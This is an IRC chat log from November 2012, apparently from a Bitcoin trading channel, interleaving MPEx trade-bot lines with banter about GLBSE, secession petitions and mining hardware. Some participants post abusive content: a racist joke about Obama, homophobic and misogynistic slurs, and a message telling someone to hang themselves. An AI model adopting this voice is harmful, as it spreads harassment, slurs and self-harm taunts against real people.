02:32:45 can you see the books of the waste contractors? Nov 13 02:32:51 I wouldn't need to Nov 13 02:33:07 wait till he is cpa Nov 13 02:33:14 lol my thoughts exactly kakobrekla Nov 13 02:33:16 kakobrekla: :D Nov 13 02:33:24 he's gonna find the gold my grand-grandfather hid when the turks invaded Nov 13 02:34:49 maybe it's a tax writeoff for donating the computers Nov 13 02:35:14 resale and donation would stop it from being classified as hazardous Nov 13 02:35:18 probalby, some carbon credits to boot Nov 13 02:35:28 lol dub is jaded Nov 13 02:35:28 in 'merica? not yet Nov 13 02:36:29 it does like this, you pay Super Envirocorp Green Recycling LLC, your govt apys them, africa pays them, and they probably don't pay tax, perfect Nov 13 02:36:39 ok, shipping computers to other countries for disposal or donation is illegal as of 1 year after those pics were taken Nov 13 02:36:44 it seems Nov 13 02:37:17 apparently someone grew a concience Nov 13 02:37:25 how socialist of them Nov 13 02:38:09 :( makes this last hour seem so pointless and wasteful Nov 13 02:39:39 really? I've been built a few $100k of internets while chatting Nov 13 02:40:21 oh, sorry, you didn't spoon feed me the info, so I had to actually work at finding it Nov 13 02:40:31 ;) Nov 13 02:40:45 free market bro, gotta do the work Nov 13 02:40:58 i just hope my daughter survived the neglect Nov 13 02:41:02 $100k of internets ?! where is that ? Nov 13 02:41:18 smickles if you find her burning computer parts you know who to send the med bills to nao. Nov 13 02:41:21 naw, just kidding, her mom was taking her for a walk Nov 13 02:41:36 neglecting the mom seems moar dangerous Nov 13 02:41:39 about 40Gbps of access network, in a farming town Nov 13 02:41:55 exploitation. Nov 13 02:42:39 by providing faster porn to the farmer, less animals will be abused Nov 13 02:42:54 you're taking advantage of their backwards farmish nature Nov 13 02:42:57 in my locality anyway, that animal porn will be made offshore Nov 13 02:43:06 to deploy your internets in less congested and thuys cheaper area Nov 13 02:44:01 grow a conscience! no more computer donations to africans and no more internets to farming towns! Nov 13 02:44:08 let apple make a buck. Nov 13 02:44:11 they demand faster porn, the market provides Nov 13 02:46:40 mircea_popescu: the market demands an MPEx api call ('PROFIT|X', where X is a positive integer in satoshi) which gives me btc Nov 13 02:47:11 go burn a keyboard Nov 13 02:47:29 all profits are belong to ME(pex) Nov 13 02:47:57 well, ~97% of them anyway Nov 13 02:48:24 I recycled two keyboards this week :( Nov 13 02:48:48 I still have those old IBM clicky keyboards Nov 13 02:49:24 let me see, it's a model M Nov 13 02:49:27 model-M? Nov 13 02:49:47 yeah, colleague near me insists on using one, annoying as hell Nov 13 02:50:02 DEPR NEED TO HEAR MY CLICKS Nov 13 02:50:37 IM A SRS ENGINEER, JUST LISTEN! Nov 13 02:55:38 [MPEX] [S.MPOE] 19321 @ 0.00050575 = 9.7716 BTC [-] Nov 13 03:12:14 12 points (100% like it) 12 up votes 0 down votes Nov 13 03:12:27 smickles m'boy you've got the perfect reddit submission. everyone likes it. Nov 13 03:20:50 [MPEX] [S.MPOE] 21765 @ 0.00050575 = 11.0076 BTC [-] Nov 13 03:20:50 [MPEX] [S.MPOE] 16685 @ 0.0005055 = 8.4343 BTC [-] Nov 13 03:46:08 [MPEX] [S.MPOE] 12576 @ 0.0005083 = 6.3924 BTC [+] Nov 13 03:46:08 [MPEX] [S.MPOE] 2820 @ 0.00051161 = 1.4427 BTC [+] Nov 13 03:46:10 [MPEX] [S.MPOE] 26932 @ 0.00051175 = 13.7825 BTC [+] Nov 13 04:00:32 Certified computer forensic examiner out of Austin, Texas, lawyer Craig Ball, says that authorities can use the serial numbers off of two flash drives, said to contain the tax returns, left at a political office in Williamson County. Each computer keeps a record of all external devices plugged into them. Considering how easy a task this is, one suspects that the authorities would have already completed it, either impl Nov 13 04:00:32 icating, or not, Brown. Nov 13 04:00:40 this is such bs. who told them what "all computers" do ffs Nov 13 04:02:21 Certified (A+, MCSE) computer exphurts Nov 13 04:04:49 especially lulzy are security certs Nov 13 04:06:43 myah. Nov 13 04:10:12 mircea_popescu: knightmb having a case built against him? Nov 13 04:10:52 coingenuity so they say. particularly uninformed article Nov 13 04:10:59 http://silvervigilante.com/richest-man-in-bitcoin-realm-secret-service/ Nov 13 04:11:51 [MPEX] [S.MPOE] 24401 @ 0.00051175 = 12.4872 BTC [+] Nov 13 04:11:53 [MPEX] [S.MPOE] 17849 @ 0.0005121 = 9.1405 BTC [+] Nov 13 04:14:25 poked above the 30 day sma again Nov 13 04:14:37 wow, I missed DiabloMiner's birthday Nov 13 04:14:43 Date: Sat Nov 6 11:16:17 2010 -0400 Nov 13 04:15:12 its now 2 years old Nov 13 04:15:29 the oldest turd that hasnt turned white Nov 13 04:20:25 so how long before pretty much everyone who issed glbse shares says fuck it and moves on ? Nov 13 04:20:40 mircea_popescu: some already have Nov 13 04:20:51 i know, but i mean the general consensus. Nov 13 04:22:24 how long has it been so far? Nov 13 04:22:33 did that happen oct 2nd? Nov 13 04:22:54 yeah, its been over a month Nov 13 04:22:59 which like a decade in bitcoin time Nov 13 04:23:18 is the send nefario flowers thing happening? Nov 13 04:24:18 smickles early oct is my recollection. Nov 13 04:24:53 dub i hope it isn't for the reason that the idiots who'd do it lost all their money to scammers already and are facing deportation Nov 13 04:24:55 to ghana. Nov 13 04:25:02 any other reason fails to satisfy. Nov 13 04:25:12 i like it Nov 13 04:25:36 gotta be creepy getting flowers from a bunch of people that basically want your scalp Nov 13 04:25:49 its saying 'you can't hide motherfucker' Nov 13 04:25:50 they don't want his scalp. Nov 13 04:26:02 they don't know what the fuck they want, but it'd be something like someone telling them they're ok. Nov 13 04:26:13 which is why the pr chick is getting on so many nerves, imho. Nov 13 04:26:13 heh, "so how long until i can just start using this btc as my own" (from the issuer's perspective), is that what you're asking mircea_popescu ? Nov 13 04:26:47 smickles well, not rly, seeing how the point of issuing was to get btc to use as their own Nov 13 04:26:56 see the rsm guy for a fine illustration Nov 13 04:27:05 ah Nov 13 04:28:15 i was asking more along the lines of, "when will everyone be forced to put glbse shares as 0 in their books" Nov 13 04:28:39 obviously prudence requires them do that already, but experience shows btc noobies absolutely never do it. Nov 13 04:36:56 [MPEX] [S.MPOE] 13250 @ 0.00050693 = 6.7168 BTC [-] Nov 13 04:49:08 https://petitions.whitehouse.gov/petition/peacefully-grant-state-texas-withdraw-united-states-america-and-create-its-own-new-government/BmdWCP8B Nov 13 04:49:13 just noticed this Nov 13 04:52:31 lolk Nov 13 04:52:41 lol Nov 13 04:53:52 it's to the point where they actually have to acknowlage it and respond to it Nov 13 04:54:17 haha Nov 13 04:54:45 Of course, when the marijuana one got there, the answer was so full of lies it boggled the mind Nov 13 04:55:05 so I expect the answer will be "no, it's illegal" Nov 13 04:55:31 illegal my foot Nov 13 04:55:34 followed by "there is no historical precident" Nov 13 04:55:35 texas did it before Nov 13 04:56:34 yeah, texas was its own country for a period Nov 13 04:56:36 http://en.wikipedia.org/wiki/Republic_of_Texas Nov 13 04:56:58 and "no country has ever formed by declaring independance" Nov 13 04:58:30 ahahah Nov 13 04:58:33 ok that'd be a good one. Nov 13 04:59:20 lol Nov 13 05:02:01 [MPEX] [S.MPOE] 21600 @ 0.0005121 = 11.0614 BTC [+] Nov 13 05:02:03 [MPEX] [S.MPOE] 6913 @ 0.00051232 = 3.5417 BTC [+] Nov 13 05:02:04 [MPEX] [S.MPOE] 24953 @ 0.00051264 = 12.7919 BTC [+] **** BEGIN LOGGING AT Tue Nov 13 13:15:50 2012 Nov 13 13:16:05 fuck you irc Nov 13 13:16:05 fuck you irc Nov 13 13:16:06 fuck you irc Nov 13 13:16:06 fuck you irc Nov 13 13:16:06 fuck you irc Nov 13 13:16:06 fuck you irc Nov 13 13:16:07 fuck you irc Nov 13 13:16:08 fuck you irc Nov 13 13:16:08 fuck you irc Nov 13 13:16:08 fuck you irc Nov 13 13:16:08 fuck you irc Nov 13 13:16:09 fuck you irc Nov 13 13:16:09 fuck you irc Nov 13 13:16:13 fuckin turn off Nov 13 13:16:15 GRRRRRRRRRRRRRR Nov 13 13:16:28 dun dun dun Nov 13 13:18:41 this is funny : https://bitcointalk.org/index.php?topic=123873.0 Nov 13 13:18:54 20-120 bitcoins in prizes, nobody replies. Nov 13 13:19:08 if i had offered .1 btc for some stupidshit like a signature it would be FULL Nov 13 13:19:10 wait, what? Nov 13 13:19:30 what am I writing? Nov 13 13:19:53 whatever you want. Nov 13 13:21:22 mircea_popescu: what exactly is it that you want written, however? Nov 13 13:22:09 well, you kinda have to read the article. but it's a 4-6k words fiction piece Nov 13 13:22:24 I did read it Nov 13 13:22:27 but you sort of go off on a tangent Nov 13 13:22:37 there's three ways i can see gpg contracts going on Nov 13 13:22:40 there could be more Nov 13 13:22:47 either find one more, or else write out one of the three Nov 13 13:23:22 how about I write a story about how the rothchilds have a pgp contract with lucifer the morningstar, their god, and thus end the world Nov 13 13:23:55 sure. Nov 13 13:24:08 except, work it out so it fits one of teh three! Nov 13 13:24:12 I dont want to be assassinated :< Nov 13 13:24:50 eh get out. Nov 13 13:26:05 nobody's getting assasinated cause of something they wrote on the interwebs Nov 13 13:26:21 but its true about them and lucifer :< Nov 13 13:26:29 even so. Nov 13 13:27:41 diablo, in that case, you don't have to fear anything when you get asassinated for revealing such truth Nov 13 13:27:57 for this deed shall surely wawrd you place in God's Kingdom Nov 13 13:28:00 ;D Nov 13 13:28:09 *award Nov 13 13:28:26 jurov: but I _am_ Lucifer :< Nov 13 13:28:35 dying _hurts_ Nov 13 13:28:39 [MPEX] [S.MPOE] 21650 @ 0.00050658 = 10.9675 BTC [+] Nov 13 13:28:59 you will, sooner or later Nov 13 13:29:07 well, sometimes. I did it a few times during WW2, some of them wern't so bad. Nov 13 13:29:39 but I guess it wont matter Nov 13 13:29:41 the world is ending soon Nov 13 13:29:56 mircea_popescu: I think I have a better idea, though Nov 13 13:30:04 a bitcoin powered ebook market. Nov 13 13:30:55 right, because bitcoin people are this mix of 1% people who have not the time to fuck their gfs and 99% people who never had a gf Nov 13 13:31:03 they're EXACTLY the people who read books. Nov 13 13:31:20 mircea_popescu: you've never read a book while getting a blowjob? Nov 13 13:31:48 nope. Nov 13 13:32:00 i prefer fondling the other girl. Nov 13 13:32:44 bah i wish cpanel would STOP CHANGING THE LOOKS OF THE WEB INTERFACE Nov 13 13:32:57 every time i go to log in they give me a jolt. Nov 13 13:33:01 "whoa, phishing ?!" Nov 13 13:35:08 In 59 Philadelphia voting divisions, Mitt Romney got zero votes. Nov 13 13:35:12 ahahaha. fo reals ?! Nov 13 13:35:33 Detroit has more registered voters than residents over 18, Census finds Nov 13 13:36:24 mircea_popescu: CLEARLY THIS IS THE WORK OF OBAMA Nov 13 13:36:26 or something Nov 13 13:36:44 my faux republican rage wore out quite some time ago Nov 13 13:37:21 i just think it's funny how 3rd world the us is. Nov 13 13:37:37 there are no first world countries left Nov 13 13:37:42 i mean, for all of the 20th century they've kept pretending and we've kept pretending like they're part of civilisation Nov 13 13:37:52 but, really... never was the case. becomes more and more obvious. Nov 13 13:37:57 mircea_popescu: well Nov 13 13:37:59 its up to us bitcoiners Nov 13 13:38:02 to create a new country Nov 13 13:38:18 one that preserves the rights of life, liberty, and PUSSY! Nov 13 13:38:22 NOW WHOS WITH ME?! Nov 13 13:38:43 crickets. Nov 13 13:38:51 You're all fags, you know that. Nov 13 13:39:28 mircea_popescu: did you (or she) set up the thread in the forums about what people think about your PR? Nov 13 13:39:47 hm ? Nov 13 13:42:52 ohio had a county where there was a 103% voter turnout Nov 13 13:43:00 you know... this happened in a hamlet in romania last elections Nov 13 13:43:11 those people are now spending their time between the da and the court. Nov 13 13:43:23 its happened everywhere forever. Nov 13 13:44:06 yeah. Nov 13 13:44:11 but you gotta keep sending them to jale. Nov 13 13:44:18 jail Nov 13 13:48:01 that too. Nov 13 13:54:03 [MPEX] [S.MPOE] 16856 @ 0.00050535 = 8.5182 BTC [-] Nov 13 13:54:05 [MPEX] [S.MPOE] 10094 @ 0.00050221 = 5.0693 BTC [-] Nov 13 13:57:37 eskimobob, go satisfy your urges there: https://bitcointalk.org/index.php?topic=102333.0 Nov 13 13:57:52 SupaDupa: wtf are you spamming? Get a life, you fkn asshole, or just hang yourself ' Nov 13 13:59:25 jurov: what urges? Nov 13 14:00:01 to know what ppl think about MPOE-PR Nov 13 14:00:20 she is a whore Nov 13 14:02:00 Guest66360 is the same scumbag SupaDupa: Nov 13 14:03:28 eskimo, you really think they will ever start such thread? why? Nov 13 14:03:41 we really need a OP here to kick idiots like supasupa for good Nov 13 14:04:04 you are definately suckin both my balls Nov 13 14:04:12 but maybe if you slow down I can pull one outta your mouf Nov 13 14:04:43 am i missing something here ? **** BEGIN LOGGING AT Tue Nov 13 14:07:30 2012 Nov 13 14:08:07 "Secession Petitions Flood White House Website" LOL http://politics.slashdot.org/story/12/11/12/2113214/secession-petitions-flood-white-house-website Nov 13 14:10:03 since Obama is president shouldn't it be called The Half-White House? Nov 13 14:10:08 considering he's half black... Nov 13 14:10:32 ahahaha Nov 13 14:10:59 too early for jokes? Nov 13 14:11:28 take a look at the petition site, it's really funny Nov 13 14:11:28 the jokes will never be funny, really Nov 13 14:11:43 its called the white house because of the color on the outside, not the colored on the inside Nov 13 14:12:19 umm Nov 13 14:12:28 are you saying Obama is black on the inside Nov 13 14:12:30 LOL! Nov 13 14:12:47 last time I checked your skin colour was on the fuckin outside Diablo-D3 Nov 13 14:12:58 http://trilema.com/2012/gpg-contracts/#comment-90442 << how the fuck do i end up with all the crazies ? Nov 13 14:13:06 considering your fuckin skin colour is only visible on the outside since it's fuckin skin Nov 13 14:13:11 this dude wants to fix bitcoin : there should be pairs of bitcoins "going in countercurrent" Nov 13 14:13:20 AreFun: you missed the joke. Nov 13 14:13:44 he did say "the colored" Nov 13 14:13:56 I know there's a ton of grape drink in The White House now Nov 13 14:14:20 at least mircea_popescu got it Nov 13 14:15:11 that didn't last long. Nov 13 14:15:19 what's his story anyway. Nov 13 14:16:04 who knows Nov 13 14:18:18 is this the guy who used to spam goatse re some bitcoin ransom or something like that ? Nov 13 14:18:37 no Nov 13 14:18:40 I thought it was usagi Nov 13 14:18:52 but usagi doesnt swear Nov 13 14:19:05 well not in his bunny costume Nov 13 14:19:17 [MPEX] [S.MPOE] 10800 @ 0.00050658 = 5.4711 BTC [+] Nov 13 14:22:14 this was probably supadupa, known lunatic from ltc and btc channel Nov 13 14:22:24 might be Nov 13 14:22:36 that asshole has been causing problems lately again Nov 13 14:22:58 yes. sending huge pkg as CTCP ping Nov 13 14:23:24 yeah, what did he think that was going to do? Nov 13 14:23:26 it doesnt do anything Nov 13 14:24:17 if you have a crappy line, it will drop your connection or something like that Nov 13 14:24:29 I have a crappy line, it does nothing. Nov 13 14:26:35 damn James Nov 13 14:27:02 who? Nov 13 14:27:04 no update https://blog.glbse.com/ Nov 13 14:27:36 oh nefario Nov 13 14:41:12 maybe he didn't like the flowers. Nov 13 14:44:37 [MPEX] [S.MPOE] 21793 @ 0.00050221 = 10.9447 BTC [-] Nov 13 14:44:38 [MPEX] [S.MPOE] 11150 @ 0.00050217 = 5.5992 BTC [-] Nov 13 14:44:40 [MPEX] [S.MPOE] 10357 @ 0.00050215 = 5.2008 BTC [-] Nov 13 14:47:33 did you copy the ltc one? :) Nov 13 14:47:45 hm ? Nov 13 14:47:52 nvm Nov 13 14:51:19 what ever happened to usagi? Nov 13 14:51:23 poof and he was gone? Nov 13 14:54:42 pretty much. Nov 13 14:56:29 lol, did they send nefario flowers? Nov 13 14:57:45 Chaang-Noi: there was a plan Nov 13 14:58:27 Chaang-Noi: usagi was here yesterday but took off shortly. Nov 13 14:59:07 Looks like he is also following me around the fkn forum like a pervert :) Nov 13 15:00:07 lol Nov 13 15:00:14 they should send nefario flowers Nov 13 15:00:18 its some lulz Nov 13 15:00:22 ill chip in Nov 13 15:03:45 Chaang-Noi: https://bitcointalk.org/index.php?topic=115669.msg1331773#msg1331773 Nov 13 15:06:31 sadly i cant post but ill go read:) Nov 13 15:06:56 loading very slowly for me Nov 13 15:09:16 ahh okay thanks :) Nov 13 15:09:27 i hope it gets done, ill chip in a btc to whoever does it Nov 13 15:09:39 [MPEX] [S.MPOE] 11650 @ 0.00050658 = 5.9017 BTC [+] Nov 13 15:09:41 [MPEX] [S.MPOE] 21250 @ 0.00050866 = 10.809 BTC [+] Nov 13 15:34:49 [MPEX] [S.MPOE] 4543 @ 0.00050215 = 2.2813 BTC [-] Nov 13 15:34:50 [MPEX] [S.MPOE] 13721 @ 0.00050198 = 6.8877 BTC [-] Nov 13 15:34:51 [MPEX] [S.MPOE] 13436 @ 0.00050175 = 6.7415 BTC [-] Nov 13 15:59:59 [MPEX] [S.MPOE] 17828 @ 0.00050175 = 8.9452 BTC [-] Nov 13 16:00:01 [MPEX] [S.MPOE] 11100 @ 0.00050164 = 5.5682 BTC [-] Nov 13 16:00:01 [MPEX] [S.MPOE] 572 @ 0.0005016 = 0.2869 BTC [-] Nov 13 16:25:04 [MPEX] [S.MPOE] 7078 @ 0.0005016 = 3.5503 BTC [-] Nov 13 16:25:06 [MPEX] [S.MPOE] 12052 @ 0.00050128 = 6.0414 BTC [-] Nov 13 16:25:07 [MPEX] [S.MPOE] 3770 @ 0.0005012 = 1.8895 BTC [-] Nov 13 16:50:44 [MPEX] [S.MPOE] 42600 @ 0.0005012 = 21.3511 BTC [-] Nov 13 16:51:09 panic sell Nov 13 16:51:10 lol Nov 13 16:52:54 ;;calc (11.30 - 11) / 11.30 Nov 13 16:52:54 0.0265486725664 Nov 13 16:53:05 ;;calc (11.9 - 11) / 11.9 Nov 13 16:53:05 0.0756302521008 Nov 13 16:53:15 ;;calc (15 - 11) / 15 Nov 13 16:53:16 0.266666666667 Nov 13 16:54:13 ;;ticker Nov 13 16:54:14 BTCUSD ticker | Best bid: 10.95001, Best ask: 10.99998, Bid-ask spread: 0.04997, Last trade: 10.99999, 24 hour volume: 20598.93273169, 24 hour low: 10.92150, 24 hour high: 11.18000, 24 hour vwap: 11.03907 Nov 13 17:15:58 [MPEX] [S.MPOE] 9692 @ 0.0005012 = 4.8576 BTC [-] Nov 13 17:15:59 [MPEX] [S.MPOE] 358 @ 0.0005011 = 0.1794 BTC [-] Nov 13 17:17:22 mircea_popescu: I feel like option prices are correlated to the bots opinion on which way the price will swing. Nov 13 17:20:22 ;;ticker Nov 13 17:20:23 BTCUSD ticker | Best bid: 10.97471, Best ask: 10.98990, Bid-ask spread: 0.01519, Last trade: 10.98990, 24 hour volume: 17626.08933055, 24 hour low: 10.92150, 24 hour high: 11.16998, 24 hour vwap: 11.03109 Nov 13 17:41:00 [MPEX] [S.MPOE] 9819 @ 0.0005011 = 4.9203 BTC [-] Nov 13 17:41:03 [MPEX] [S.MPOE] 37231 @ 0.0005009 = 18.649 BTC [-] Nov 13 17:47:13 really ? Nov 13 17:52:18 so what's the story with the bfl/other asics ? late october came and went, early november came and by now went Nov 13 17:52:27 we're mid november... Nov 13 18:06:37 [MPEX] [S.MPOE] 15019 @ 0.0005009 = 7.523 BTC [-] Nov 13 18:06:39 [MPEX] [S.MPOE] 17400 @ 0.00050085 = 8.7148 BTC [-] Nov 13 18:06:39 [MPEX] [S.MPOE] 831 @ 0.00050066 = 0.416 BTC [-] Nov 13 18:09:44 "You never donated for the welfare of this forum. Your username is present in various ignore lists. You have no respect for Theymos neither you share any preferences with him." Nov 13 18:09:54 hohoho this thread is turning into quite the lulzfarm Nov 13 18:11:43 sounds like fpga story? Nov 13 18:11:48 history does really repeat itself Nov 13 18:25:19 abracadabra possibly. Nov 13 18:25:54 i do have various bets bound to make me a lot of monyz if there's no asics this year, so Nov 13 18:32:15 [MPEX] [S.MPOE] 34600 @ 0.00050066 = 17.3228 BTC [-] Nov 13 18:57:17 [MPEX] [S.MPOE] 4269 @ 0.00050066 = 2.1373 BTC [-] Nov 13 18:57:19 [MPEX] [S.MPOE] 8516 @ 0.00050006 = 4.2585 BTC [-] Nov 13 19:22:44 [MPEX] [S.MPOE] 31350 @ 0.00050115 = 15.7111 BTC [+] Nov 13 19:22:46 [MPEX] [S.MPOE] 19850 @ 0.00050121 = 9.949 BTC [+] Nov 13 19:48:09 [MPEX] [S.MPOE] 31700 @ 0.00050006 = 15.8519 BTC [-] Nov 13 19:57:19 so theymos has not read the thread but has an opinion. Nov 13 19:57:27 why is this guy even involved ? Nov 13 19:57:29 :( Nov 13 19:57:42 i must have missed something here. some college student. ok, so ? Nov 13 19:58:03 mircea_popescu: just... like... Nov 13 19:58:28 why did you consider glbse to be shady or poorly run or whatever compared to yours? Nov 13 19:58:45 kuzetsa that's a long list. Nov 13 19:59:05 other than just being a competing service (which is a major reason I blindly ignored your criticism when I was actively getting myself screwed a few months ago on GLBSE) Nov 13 19:59:24 http://trilema.com/2012/security-comparison-of-bitcoin-denominated-instruments-exchanges/ Nov 13 19:59:26 for instance. Nov 13 20:00:23 but to try and sum up months of history : i considered it poorly run right off the bat for technical reasons. Nov 13 20:00:52 these involve deep issues of security from a philosophical perspective, but also simple things like, they were using google analytics on the pages ;/ Nov 13 20:00:59 ah lol yeah. I always try to make sure my session cookies end up invalid whenever I got AFK by manually logging out :) Nov 13 20:01:16 and i considered it shady because of the behaviour re scammers. the exact sort of thing theymos is doing. Nov 13 20:01:35 nefario supported peter lambert, theymos is supporting patrick harnett, it's all the same "buddy-buddy" bullshit. Nov 13 20:01:49 sup folks Nov 13 20:01:52 this is not how people who have any business experience or any understanding of the world or intellectual maturity behave,. Nov 13 20:02:08 this is behind-the-bleachers sort of teenage crap. Nov 13 20:02:29 but by now i could probably write a book as to all the many countless things that were wrong with it. Nov 13 20:02:37 heya kakobreklaaa Nov 13 20:02:48 how is it Nov 13 20:03:01 same old. Nov 13 20:03:08 :) Nov 13 20:03:34 thanks mircea_popescu, that list was pretty exhaustive. better managed & more secure with a solid exit strategy :( Nov 13 20:04:00 right. Nov 13 20:04:17 and the funny thing is, people jumped all over mpex back in july cause "o, what happens if mpex goes away" Nov 13 20:04:29 and the pr girl said AT THE TIME "now go ask glbse the same thing" Nov 13 20:04:29 heh Nov 13 20:04:34 but people want to be dense. Nov 13 20:04:39 :/ Nov 13 20:04:49 i can dig up the quote for you if it helps anything. Nov 13 20:04:59 yeah. assuming that genuine concern is trolling has become too common. Nov 13 20:05:15 right. Nov 13 20:05:27 easy cop out too. someone says something we don't understand ? THEYRE TROLLING Nov 13 20:05:32 a la usagi. Nov 13 20:05:45 I wouldn't know Nov 13 20:06:13 you couldn't have missed that guy's stuff, it was all over the forum at some point. Nov 13 20:06:50 out of all the bitcointalk threads, and the freenode #bitcoin-xxx? discissions I've participated, the name usagi doesn't really stand out. Nov 13 20:07:10 vaguely perhaps... I dunno. Nov 13 20:07:46 a well, you're blessed. Nov 13 20:07:55 ask EskimoBob lol Nov 13 20:07:59 my skills of observation / attention span & short term memory are kinda limited. chronic symptoms from acquired brain injury I got a few years ago due to hurricane katrina (2005) Nov 13 20:08:08 btw usagi returned day or two ago Nov 13 20:08:14 and now I live in NY, wheee! yay for sandy lolo Nov 13 20:08:23 maybe you're attracting them Nov 13 20:08:26 yes Nov 13 20:13:24 [MPEX] [S.MPOE] 6184 @ 0.00050006 = 3.0924 BTC [-] Nov 13 20:13:25 [MPEX] [S.MPOE] 16000 @ 0.00049923 = 7.9877 BTC [-] Nov 13 20:13:27 [MPEX] [S.MPOE] 27110 @ 0.00049913 = 13.5314 BTC [-] Nov 13 20:13:28 [MPEX] [S.MPOE] 4309 @ 0.00049865 = 2.1487 BTC [-] Nov 13 20:32:22 ;;bc,stats Nov 13 20:32:24 Current Blocks: 200134 | Current Difficulty: 2864140.507811 | Next Difficulty At Block: 201599 | Next Difficulty In: 1465 blocks | Next Difficulty In About: 1 week, 3 days, 9 hours, 51 minutes, and 50 seconds | Next Difficulty Estimate: 3196800.71455154 | Estimated Percent Change: 11.6146608671 Nov 13 20:38:49 [MPEX] [S.MPOE] 14621 @ 0.00049865 = 7.2908 BTC [-] Nov 13 20:38:51 [MPEX] [S.MPOE] 8050 @ 0.00049862 = 4.0139 BTC [-] Nov 13 20:38:51 [MPEX] [S.MPOE] 24529 @ 0.00049851 = 12.228 BTC [-] Nov 13 20:38:54 [MPEX] [S.DICE] 76000 @ 0.00325 = 247 BTC [-] Nov 13 20:40:35 [MPEX] [S.DICE] 119628 @ 0.00325 = 388.791 BTC [-] Nov 13 20:40:53 [MPEX] [S.DICE] 42700 @ 0.00325 = 138.775 BTC [-] Nov 13 21:06:09 [MPEX] [S.MPOE] 40539 @ 0.00049922 = 20.2379 BTC [+] Nov 13 21:06:10 [MPEX] [S.MPOE] 11379 @ 0.00050121 = 5.7033 BTC [+] Nov 13 21:32:10 [MPEX] [S.MPOE] 15521 @ 0.00049851 = 7.7374 BTC [-] Nov 13 21:32:12 [MPEX] [S.MPOE] 10274 @ 0.00049844 = 5.121 BTC [-] Nov 13 21:32:13 [MPEX] [S.MPOE] 6705 @ 0.00049796 = 3.3388 BTC [-] Nov 13 21:33:57 plummet my friend Nov 13 21:35:33 [MPEX] [S.DICE] 9260 @ 0.00325 = 30.095 BTC [-] Nov 13 21:41:42 [MPEX] [S.DICE] 32412 @ 0.00325 = 105.339 BTC [-] Nov 13 22:06:57 [MPEX] [S.MPOE] 16852 @ 0.00049796 = 8.3916 BTC [-] Nov 13 22:06:57 [MPEX] [S.MPOE] 15944 @ 0.00049792 = 7.9388 BTC [-] Nov 13 22:06:59 [MPEX] [S.MPOE] 10098 @ 0.00049791 = 5.0279 BTC [-] Nov 13 22:07:00 [MPEX] [S.MPOE] 3806 @ 0.00049761 = 1.8939 BTC [-] Nov 13 22:32:06 [MPEX] [S.MPOE] 18760 @ 0.00049761 = 9.3352 BTC [-] Nov 13 22:32:08 [MPEX] [S.MPOE] 90 @ 0.00049756 = 0.0448 BTC [-] Nov 13 22:48:53 [MPEX] [S.DICE] 9260 @ 0.00325 = 30.095 BTC [-] Nov 13 22:48:54 [MPEX] [S.DICE] 740 @ 0.00339942 = 2.5156 BTC [+] Nov 13 23:14:50 [MPEX] [S.MPOE] 10860 @ 0.00049756 = 5.4035 BTC [-] Nov 13 23:14:51 [MPEX] [S.MPOE] 2710 @ 0.0004975 = 1.3482 BTC [-] Nov 13 23:21:16 I have a TurnKey Bitcoin Casino located at https://www.luckybitcoincasino.com for sale. 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Nov 14 00:05:07 [MPEX] [S.MPOE] 8046 @ 0.0004975 = 4.0029 BTC [-] Nov 14 00:05:09 [MPEX] [S.MPOE] 10700 @ 0.00049738 = 5.322 BTC [-] Nov 14 00:05:10 [MPEX] [S.MPOE] 154 @ 0.00049736 = 0.0766 BTC [-] Nov 14 00:11:01 https://bitcointalk.org/index.php?topic=124093.msg1333332#msg1333332 Nov 14 00:11:23 might be a nice test to see if one of the largest companies in the world's lawyers think bitcoin is money Nov 14 00:11:45 then again, if the lawyers look at it, they might just say no by default Nov 14 00:12:36 hehehe Nov 14 00:13:50 anyone have a link handy to that nefario-at-conference lulzgasm ? Nov 14 00:19:07 http://www.youtube.com/watch?v=vmPD_YSQ--k Nov 14 00:19:42 http://www.youtube.com/watch?v=L4iPCpmv678 Nov 14 00:20:23 lol, two different angles Nov 14 00:20:43 let's make a 3d rendering of his face! Nov 14 00:21:13 tyvm Nov 14 00:21:40 jurov's is better : works in html5 Nov 14 00:22:06 it's linked from https://twitter.com/BitcoinConf2012 Nov 14 00:24:04 http://trilema.com/2012/the-bitcoin-conference-nobody-went-to/ Nov 14 00:24:08 if anyone wants re-runs Nov 14 00:28:58 beating a dead horse now? Nov 14 00:30:12 yep. i'm a scholar. beatingdead horses is what i principally do. Nov 14 00:31:40 :) Nov 14 00:31:47 [MPEX] [S.MPOE] 19835 @ 0.00049736 = 9.8651 BTC [-] Nov 14 00:35:01 a, ok. **** ENDING LOGGING AT Wed Nov 14 01:09:26 2012 **** BEGIN LOGGING AT Wed Nov 14 01:09:53 2012 Nov 14 01:10:08 I cant run an auction denominated !usd Nov 14 01:10:14 what the fuck Nov 14 01:10:17 -NickServ- You failed to identify in time for the nickname mircea_popescu **** BEGIN LOGGING AT Wed Nov 14 02:55:47 2012 Nov 14 03:02:39 [MPEX] [S.MPOE] 14064 @ 0.00049776 = 7.0005 BTC [-] Nov 14 03:02:41 [MPEX] [S.MPOE] 14686 @ 0.00050023 = 7.3464 BTC [+] Nov 14 03:16:10 http://fox8.com/2012/11/13/labor-fight-could-kill-off-twinkies-wonder-bread/ wow no more twinkies. Nov 14 03:16:19 this is like, step 1. Nov 14 03:16:55 yeah, thats end of the world shit right there Nov 14 03:17:06 revolution is always 3 twinkies away Nov 14 03:19:44 what's next, i wonder ? maybe no more coke ? Nov 14 03:22:03 coke is highly proffitable Nov 14 03:22:27 coca-cola i meant, not cocaine Nov 14 03:22:28 i have family involved with hostes, they are just going to shut things down and sell off Nov 14 03:22:39 yeah coca-cola is highly profitable Nov 14 03:22:50 its almost a momopoly and coke is sold everywhere in the west... Nov 14 03:23:00 they can sell coke for less than they sell bottled water :/ Nov 14 03:23:20 coke is a pretty solid Nov 14 03:23:46 i could not load your artical but i know 3 plants have been shut down cuz of the strike and they wont reopen Nov 14 03:24:31 i dont think they will open up again, its better for them just to sell off their assets, labour costs are going to kill them Nov 14 03:24:42 aha Nov 14 03:25:50 paying people medical and retired benifits for min wage factory jobs like boxing and what not is silly, in china they do it for 20 cents a day, here in the usa its crazy like $100 a person... Nov 14 03:26:01 im shocked they lasted as long as they have Nov 14 03:26:45 http://kottke.org/12/11/scheming-boxes Nov 14 03:26:48 we're fucked Nov 14 03:27:31 d-3 if you keep them feed they will be good :) Nov 14 03:27:36 lmao Nov 14 03:27:55 [MPEX] [S.MPOE] 22350 @ 0.00049649 = 11.0966 BTC [-] Nov 14 03:27:57 [MPEX] [S.MPOE] 3700 @ 0.00049638 = 1.8366 BTC [-] Nov 14 03:28:52 lol, Nov 14 